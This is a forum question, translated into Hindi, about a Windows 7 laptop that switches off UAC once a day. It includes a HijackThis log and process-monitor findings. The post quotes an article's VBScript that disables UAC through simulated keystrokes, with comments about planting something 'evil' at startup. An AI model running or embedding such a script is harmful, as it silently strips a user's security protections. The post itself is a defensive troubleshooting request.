मुझे अपने एचपी लैपटॉप पर अजीब समस्या है। हाल ही में ऐसा होने लगा। जब भी मैं अपनी मशीन शुरू करता हूं, विंडोज 7 एक्शन सेंटर निम्नलिखित चेतावनी प्रदर्शित करता है:
UAC को बंद करने के लिए आपको अपना कंप्यूटर पुनरारंभ करना होगा।
वास्तव में, ऐसा नहीं होता है यदि यह एक विशिष्ट दिन में एक बार हुआ हो। उदाहरण के लिए, जब मैं सुबह मशीन शुरू करता हूं, तो यह पता चलता है; लेकिन यह उस दिन के बाद के पुनरारंभ में कभी नहीं दिखा। अगले दिन फिर वही बात होती है।
मैं UAC को कभी अक्षम नहीं करता, लेकिन जाहिर है कि कुछ रूटकिट या वायरस इसका कारण बनते हैं। जैसे ही मुझे यह चेतावनी मिलती है, मैं यूएसी सेटिंग्स के लिए हेड हो जाता हूं, और यूएसी को इस चेतावनी को खारिज करने के लिए फिर से सक्षम करता हूं। यह एक कष्टप्रद स्थिति है क्योंकि मैं इसे ठीक नहीं कर सकता।
सबसे पहले, मैंने किसी भी संभावित वायरस और मैलवेयर / रूटकिट गतिविधि के लिए कंप्यूटर पर एक पूर्ण स्कैन चलाया है, लेकिन TrendMicro OfficeScan ने कहा कि कोई वायरस नहीं मिला है। मैं विंडोज सिस्टम रिस्टोर का उपयोग करके एक पुराने रिस्टोर प्वाइंट पर गया, लेकिन समस्या हल नहीं हुई।
मैंने अब तक क्या कोशिश की है (जो रूटकिट नहीं पा सका है):
- TrendMicro OfficeScan एंटीवायरस
- AVAST
- मालवेयर बाइट्स एंटी - मालवेयर
- विज्ञापन जानकारी
- विप्र एंटीवायरस
- GMER
- TDSSKiller (कैस्परस्की लैब्स)
- HijackThis
- RegRuns
- UnHackMe
- SuperAntiSpyware पोर्टेबल
- Tizer रूटकिट रेजर ( * )
- सोफोस एंटी-रूटकिट
- SpyHunter 4
- ComboFix
मशीन पर कोई अन्य अजीब गतिविधियां नहीं हैं। इस विचित्र घटना को छोड़कर सब कुछ ठीक है।
इस कष्टप्रद रूटकिट का नाम क्या हो सकता है? मैं कैसे पता लगा सकता हूं और इसे हटा सकता हूं?
EDIT: नीचे HijackThis द्वारा निर्मित लॉग फ़ाइल है:
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 13:07:04, on 17.01.2011
Platform: Windows 7 (WinNT 6.00.3504)
MSIE: Internet Explorer v8.00 (8.00.7600.16700)
Boot mode: Normal
Running processes:
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\CheckPoint\SecuRemote\bin\SR_GUI.Exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\system32\igfxsrvc.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QLBCTRL.exe
C:\Program Files\Analog Devices\Core\smax4pnp.exe
C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\VolCtrl.exe
C:\Program Files\LightningFAX\LFclient\lfsndmng.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Microsoft Office Communicator\communicator.exe
C:\Program Files\Iron Mountain\Connected BackupPC\Agent.exe
C:\Program Files\Trend Micro\OfficeScan Client\PccNTMon.exe
C:\Program Files\Microsoft LifeCam\LifeExp.exe
C:\Program Files\Hewlett-Packard\Shared\HpqToaster.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\mimio\mimio Studio\system\aps_tablet\atwtusb.exe
C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE
C:\Program Files\Babylon\Babylon-Pro\Babylon.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Users\userx\Desktop\HijackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,AutoConfigURL = http://www.yaysat.com.tr/proxy/proxy.pac
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Babylon IE plugin - {9CFACCB6-2F3F-4177-94EA-0D2B72D384C1} - C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O4 - HKLM\..\Run: [IgfxTray] C:\Windows\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\Windows\system32\hkcmd.exe
O4 - HKLM\..\Run: [Persistence] C:\Windows\system32\igfxpers.exe
O4 - HKLM\..\Run: [hpWirelessAssistant] C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [QlbCtrl.exe] C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\Core\smax4pnp.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [lfsndmng] C:\Program Files\LightningFAX\LFclient\LFSNDMNG.EXE
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [Communicator] "C:\Program Files\Microsoft Office Communicator\communicator.exe" /fromrunkey
O4 - HKLM\..\Run: [AgentUiRunKey] "C:\Program Files\Iron Mountain\Connected BackupPC\Agent.exe" -ni -sss -e http://localhost:16386/
O4 - HKLM\..\Run: [OfficeScanNT Monitor] "C:\Program Files\Trend Micro\OfficeScan Client\pccntmon.exe" -HideWindow
O4 - HKLM\..\Run: [Babylon Client] C:\Program Files\Babylon\Babylon-Pro\Babylon.exe -AutoStart
O4 - HKLM\..\Run: [LifeCam] "C:\Program Files\Microsoft LifeCam\LifeExp.exe"
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - Global Startup: mimio Studio.lnk = C:\Program Files\mimio\mimio Studio\mimiosys.exe
O8 - Extra context menu item: Microsoft Excel'e &Ver - res://C:\PROGRA~1\MICROS~1\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Translate this web page with Babylon - res://C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/ActionTU.htm
O8 - Extra context menu item: Translate with Babylon - res://C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/Action.htm
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~1\Office12\REFIEBAR.DLL
O9 - Extra button: Translate this web page with Babylon - {F72841F0-4EF1-4df5-BCE5-B3AC8ACF5478} - C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll
O9 - Extra 'Tools' menuitem: Translate this web page with Babylon - {F72841F0-4EF1-4df5-BCE5-B3AC8ACF5478} - C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll
O16 - DPF: {00134F72-5284-44F7-95A8-52A619F70751} (ObjWinNTCheck Class) - https://172.20.12.103:4343/officescan/console/html/ClientInstall/WinNTChk.cab
O16 - DPF: {08D75BC1-D2B5-11D1-88FC-0080C859833B} (OfficeScan Corp Edition Web-Deployment SetupCtrl Class) - https://172.20.12.103:4343/officescan/console/html/ClientInstall/setup.cab
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = yaysat.com
O17 - HKLM\Software\..\Telephony: DomainName = yaysat.com
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = yaysat.com
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: Domain = yaysat.com
O18 - Protocol: qcom - {B8DBD265-42C3-43E6-B439-E968C71984C6} - C:\Program Files\Common Files\Quest Shared\CodeXpert\qcom.dll
O22 - SharedTaskScheduler: FencesShellExt - {1984DD45-52CF-49cd-AB77-18F378FEA264} - C:\Program Files\Stardock\Fences\FencesMenu.dll
O23 - Service: Andrea ADI Filters Service (AEADIFilters) - Andrea Electronics Corporation - C:\Windows\system32\AEADISRV.EXE
O23 - Service: AgentService - Iron Mountain Incorporated - C:\Program Files\Iron Mountain\Connected BackupPC\AgentService.exe
O23 - Service: Agere Modem Call Progress Audio (AgereModemAudio) - LSI Corporation - C:\Program Files\LSI SoftModem\agrsmsvc.exe
O23 - Service: BMFMySQL - Unknown owner - C:\Program Files\Quest Software\Benchmark Factory for Databases\Repository\MySQL\bin\mysqld-max-nt.exe
O23 - Service: Com4QLBEx - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe
O23 - Service: hpqwmiex - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
O23 - Service: OfficeScanNT RealTime Scan (ntrtscan) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\ntrtscan.exe
O23 - Service: SMS Task Sequence Agent (smstsmgr) - Unknown owner - C:\Windows\system32\CCM\TSManager.exe
O23 - Service: Check Point VPN-1 Securemote service (SR_Service) - Check Point Software Technologies - C:\Program Files\CheckPoint\SecuRemote\bin\SR_Service.exe
O23 - Service: Check Point VPN-1 Securemote watchdog (SR_Watchdog) - Check Point Software Technologies - C:\Program Files\CheckPoint\SecuRemote\bin\SR_Watchdog.exe
O23 - Service: Trend Micro Unauthorized Change Prevention Service (TMBMServer) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\..\BM\TMBMSRV.exe
O23 - Service: OfficeScan NT Listener (tmlisten) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\tmlisten.exe
O23 - Service: OfficeScan NT Proxy Service (TmProxy) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\TmProxy.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - RealVNC Ltd. - C:\Program Files\RealVNC\VNC4\WinVNC4.exe
--
End of file - 8204 bytes
जैसा कि इसी समान प्रश्न में सुझाव दिया गया है , मैंने RegRun और UnHackMe के साथ पूर्ण स्कैन (+ बूट समय स्कैन) चलाया है, लेकिन उन्हें भी कुछ नहीं मिला। मैंने इवेंट व्यूअर में सभी प्रविष्टियों की सावधानीपूर्वक जांच की है, लेकिन कुछ भी गलत नहीं है।
अब मुझे पता है कि मेरी मशीन पर एक छिपा ट्रोजन (रूटकिट) है जो खुद को काफी सफलतापूर्वक छिपाने लगता है। ध्यान दें कि मेरे पास HDD को हटाने, या ओएस को फिर से स्थापित करने का मौका नहीं है क्योंकि यह कंपनी के डोमेन पर कुछ आईटी नीतियों के अधीन काम करने वाली मशीन है।
मेरे सभी प्रयासों के बावजूद, समस्या अभी भी बनी हुई है। मुझे कड़ाई से जो कुछ भी है उसे हटाने के लिए एक टू-द-पॉइंट विधि या पक्के रूटकिट रिमूवर की आवश्यकता है। मैं सिस्टम सेटिंग्स के साथ बंदर नहीं करना चाहता, यानी एक-एक करके ऑटो को चलाना, रजिस्ट्री को गड़बड़ाना, आदि।
EDIT 2: मुझे एक लेख मिला है जो मेरी परेशानी से जुड़ा है:
मैलवेयर विंडोज 7 में यूएसी को बंद कर सकता है; "डिज़ाइन द्वारा" Microsoft का कहना है । Microsoft को विशेष धन्यवाद (!)।
लेख में, UAC को स्वचालित रूप से अक्षम करने के लिए एक VBScript कोड दिया गया है:
'// 1337H4x Written by _____________
'// (12 year old)
Set WshShell = WScript.CreateObject("WScript.Shell")
'// Toggle Start menu
WshShell.SendKeys("^{ESC}")
WScript.Sleep(500)
'// Search for UAC applet
WshShell.SendKeys("change uac")
WScript.Sleep(2000)
'// Open the applet (assuming second result)
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{ENTER}")
WScript.Sleep(2000)
'// Set UAC level to lowest (assuming out-of-box Default setting)
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
'// Save our changes
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{ENTER}")
'// TODO: Add code to handle installation of rebound
'// process to continue exploitation, i.e. place something
'// evil in Startup folder
'// Reboot the system
'// WshShell.Run "shutdown /r /f"
दुर्भाग्य से, यह मुझे नहीं बताता कि मैं अपने सिस्टम पर चल रहे इस दुर्भावनापूर्ण कोड से कैसे छुटकारा पा सकता हूं।
EDIT 3: कल रात, मैंने SQL कार्य चलाने के कारण लैपटॉप को खुला छोड़ दिया। जब मैं सुबह आया, मैंने देखा कि यूएसी को बंद कर दिया गया था। इसलिए, मुझे संदेह है कि समस्या स्टार्टअप से संबंधित नहीं है। यह सुनिश्चित करने के लिए दिन में एक बार हो रहा है कि क्या मशीन को रिबूट किया जाए।
EDIT 4: आज, मैंने तुरंत "प्रोसेस मॉनिटर" शुरू किया जैसे ही विंडोज को दोषी व्यक्ति को पकड़ने के लिए शुरू किया गया था (विचार के लिए @harrymc के लिए धन्यवाद)। 9:17 पर, यूएसी स्लाइडर को नीचे की ओर खिसकाया गया था (विंडोज 7 एक्शन सेंटर ने चेतावनी दी थी)। मैंने 9:16 और 9:18 के बीच सभी रजिस्ट्री कार्रवाइयों की जांच की। मैंने प्रोसेस मॉनिटर लॉग फ़ाइल (70MB जिसमें केवल 2 मिनट का अंतराल है) को बचाया। बहुत सारी EnableLUA = 0
(और अन्य) प्रविष्टियाँ हैं। मैं नीचे पहले 4 के गुण विंडो के स्क्रीनशॉट पोस्ट कर रहा हूं। यह कहता svchost.exe
है कि यह कर रहा है, और कुछ थ्रेड और पीआईडी नंबर देता है। मुझे नहीं पता कि मुझे उनके बारे में क्या जानना चाहिए: